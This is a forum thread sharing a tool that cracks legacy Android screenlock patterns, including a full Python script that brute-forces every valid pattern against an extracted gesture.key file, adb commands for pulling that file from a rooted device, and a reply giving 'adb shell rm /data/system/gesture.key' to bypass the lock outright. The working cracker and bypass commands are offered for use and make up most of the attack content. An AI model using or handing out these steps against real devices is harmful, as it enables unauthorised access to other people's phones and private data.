[Tool] Android Screenlock Gesture Crack
#1
AndroidGestureCrack

Cracks Android Screenlock Gesture Pattern using dictionary Attack

Description

A Java tool to crack the gesture screenlock pattern of an Android phone. Android's pattern lock stores a SHA1 hash of the pattern in a gesture.key file in the /data/system folder in the internal memory of the Android device. It has been tested on Android API Level 15 and up, but should work with lower versions as well. As long as you extract the gesture.key file this tool will work well. The key is a SHA1 hash of the sequence of bytes of the pattern. The hash is unsalted and hence very easy to crack. The code uses the dictionary which you can download from the link below:

Download Dictionary

Usage

You need to get the gesture.key file from Android's hidden system folder and extract the dictionary file from the link above. Use them in the following way:

Code:
java -jar AndroidGestureCrack.jar --gui
or
java -jar AndroidGestureCrack.jar gesture.key AndroidGestureSHA1.txt

Sample Run

[Image: WJICRtw.png]

[Image: 687474703a2f2f692e696d6775722e636f6d2f72...4c2e706e67]

Note: There is scope to improve the GUI (I haven't used any layouts in general, but if you make some changes then let me know).

Project Link: https://github.com/AnimeshShaw/AndroidGestureCrack
Download Latest release: https://github.com/AnimeshShaw/AndroidGe...eCrack.jar

You require Java 8 to compile the code.

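The post above states the whole of what makes this attack cheap: gesture.key is an unsalted SHA1 over the raw pattern bytes, and the pattern keyspace is tiny. The following Python script is an added example, not the AndroidGestureCrack code and not from the original post. It assumes what the post says about the format: the nine dots are numbered 0..8 row by row and each dot drawn is one byte, which is how Android's LockPatternUtils serialises a pattern. Instead of downloading a dictionary it enumerates every pattern Android accepts (4 to 9 distinct dots, and a straight move may only pass over a dot that is already in the pattern), which comes to 389,112 candidates, and then looks the 20-byte gesture.key up in that set. SAMPLE_GESTURE_KEY is constructed here for the pattern 0-1-2-5-8 so the script runs without a device.

```python
import hashlib
import sys

# Cell numbering used by Android's LockPatternUtils when it serialises a
# pattern: each dot becomes one byte, row * 3 + col, in the order drawn.
#   0 1 2
#   3 4 5
#   6 7 8
GRID = 3
CELLS = GRID * GRID


def pattern_to_hash(cells):
    """Unsalted SHA-1 over the raw cell bytes, which is what gesture.key holds."""
    return hashlib.sha1(bytes(cells)).digest()


def _skipped_cell(a, b):
    """Return the dot lying exactly halfway between a and b, or None.

    0 -> 2 passes over 1, 0 -> 8 passes over 4, 3 -> 5 passes over 4. Android
    only accepts such a move if the middle dot is already part of the pattern;
    otherwise the UI selects the middle dot instead, so the jump never occurs.
    """
    ra, ca = divmod(a, GRID)
    rb, cb = divmod(b, GRID)
    if (ra + rb) % 2 or (ca + cb) % 2:
        return None  # no dot sits exactly halfway (adjacent or knight-style move)
    return ((ra + rb) // 2) * GRID + (ca + cb) // 2


def enumerate_patterns(min_len=4, max_len=9):
    """Yield every pattern Android accepts as a tuple of cell numbers."""
    def walk(path, used):
        if len(path) >= min_len:
            yield tuple(path)
        if len(path) == max_len:
            return
        for nxt in range(CELLS):
            if used[nxt]:
                continue
            mid = _skipped_cell(path[-1], nxt)
            if mid is not None and not used[mid]:
                continue  # would jump over an unused dot: not a legal pattern
            used[nxt] = True
            path.append(nxt)
            yield from walk(path, used)
            path.pop()
            used[nxt] = False

    for start in range(CELLS):
        used = [False] * CELLS
        used[start] = True
        yield from walk([start], used)


def build_dictionary(min_len=4, max_len=9):
    """Map SHA-1 digest -> pattern for the whole keyspace (389,112 entries)."""
    return {pattern_to_hash(p): p for p in enumerate_patterns(min_len, max_len)}


def crack(gesture_key, table=None):
    """Return the pattern whose hash equals gesture_key, or None if no pattern matches."""
    if len(gesture_key) != hashlib.sha1().digest_size:
        raise ValueError("gesture.key should be exactly 20 bytes (one SHA-1 digest)")
    if table is not None:
        return table.get(gesture_key)
    for p in enumerate_patterns():  # linear scan, no precomputed table needed
        if pattern_to_hash(p) == gesture_key:
            return p
    return None


def draw(pattern):
    """Render a pattern as a 3x3 grid showing the order in which each dot was hit."""
    rows = []
    for r in range(GRID):
        cells = range(r * GRID, (r + 1) * GRID)
        rows.append(" ".join(str(pattern.index(c) + 1) if c in pattern else "."
                             for c in cells))
    return "\n".join(rows)


# Constructed sample: the 20 bytes a device would hold for the pattern 0-1-2-5-8.
SAMPLE_GESTURE_KEY = pattern_to_hash((0, 1, 2, 5, 8))

if __name__ == "__main__":
    # Usage: python crack_gesture.py [gesture.key]
    key = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_GESTURE_KEY
    found = crack(key)
    print("no match" if found is None else f"pattern {found}\n{draw(found)}")
```

The file is owned by system with mode 0600, so it is only reachable as root; the usual route on a rooted device with USB debugging is `adb shell su -c "cp /data/system/gesture.key /sdcard/"` followed by `adb pull /sdcard/gesture.key`. The whole keyspace hashes in about a second in plain Python, which is the practical meaning of "unsalted SHA1": salting would not enlarge the keyspace, only the short pattern length makes this feasible. This file format is the one Android used up to 5.1; Android 6.0 replaced gesture.key with gatekeeper.pattern.key, which is verified through Gatekeeper with a salted, rate-limited check, so on those versions there is no 20-byte file for this tool to read.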
#2
Very nice find! Surprised how easy this can be done :O
#3
(10-22-2015, 11:38 AM)Hackzors Wrote: Very nice find! Surprised how easy this can be done :O

Thanks :)

This is not new though; it can also be done if you can remove the gesture.key. For example, on a rooted phone, if you enable USB debugging, connect it to your PC and use adb to remove the file, then you can also bypass it. In that case you can simply choose a single gesture point. We can do the following:

Code:
adb shell rm /data/system/gesture.key
#4
(10-22-2015, 12:12 PM)Psycho_Coder Wrote:
(10-22-2015, 11:38 AM)Hackzors Wrote: Very nice find! Surprised how easy this can be done :O

Thanks :)

This is not new though; it can also be done if you can remove the gesture.key. For example, on a rooted phone, if you enable USB debugging, connect it to your PC and use adb to remove the file, then you can also bypass it. In that case you can simply choose a single gesture point. We can do the following:

Code:
adb shell rm /data/system/gesture.key

So when you delete the gesture.key, the phone won't need an unlock pattern at all? Or can you just randomly press a pattern, and it will work?
Wouldn't the system have some sort of protection for this?
#5
(10-22-2015, 12:17 PM)Hackzors Wrote:
(10-22-2015, 12:12 PM)Psycho_Coder Wrote:
(10-22-2015, 11:38 AM)Hackzors Wrote: Very nice find! Surprised how easy this can be done :O

Thanks :)

This is not new though; it can also be done if you can remove the gesture.key. For example, on a rooted phone, if you enable USB debugging, connect it to your PC and use adb to remove the file, then you can also bypass it. In that case you can simply choose a single gesture point. We can do the following:

Code:
adb shell rm /data/system/gesture.key

So when you delete the gesture.key, the phone won't need an unlock pattern at all? Or can you just randomly press a pattern, and it will work?
Wouldn't the system have some sort of protection for this?

That used to be the case: once the key file was removed the phone would accept any gesture and save that to the gesture.key file. Not sure if this is still the case though, as I read about this method some time ago and there have been many updates since then. I have a rooted tablet so will play around with it a little tonight and see for myself.
#6
(10-22-2015, 11:38 AM)Hackzors Wrote: Very nice find! Surprised how easy this can be done :O

I would like to note that Psycho probably actually wrote this code and didn't "find" it. He's a very talented programmer and seems to get all sorts of interesting inspirations, like this one.
#7
(10-22-2015, 06:05 PM)NO-OP Wrote:
(10-22-2015, 11:38 AM)Hackzors Wrote: Very nice find! Surprised how easy this can be done :O

I would like to note that Psycho probably actually wrote this code and didn't "find" it.  He's a very talented programmer and seems to get all sorts of interesting inspirations, like this one.

Yes, I would give my thanks to the site that developed the dictionary. We can create the dictionary ourselves as well, but it's just a bit time-consuming, nothing more. Moreover, I have mentioned the details in my description too :)

I will improve the code to make it more robust and make it do more things. Thanks for the input ^_^
#8
Nice job Psycho_Coder, I had no idea you could even do this in the first place (find the pass-code). I'm going to try this on my tablet when I have time :)
#9
(10-22-2015, 10:09 PM)Insider Wrote: Nice job Psycho_Coder, I had no idea you could even do this in the first place (find the pass-code). I'm going to try this on my tablet when I have time :)

Thanks. By the way, I have always been associated with InfoSec. It is just that when I was with bigger forums like HC or HS there were already hundreds of threads for different InfoSec topics, and programming didn't always get much attention, so I focused on that. But now, since this forum is a bud that is growing nicely, I wanted to nourish it a bit with my little experience. That's all!!! :) :)
#10
Made little changes to the main code and added an executable jar.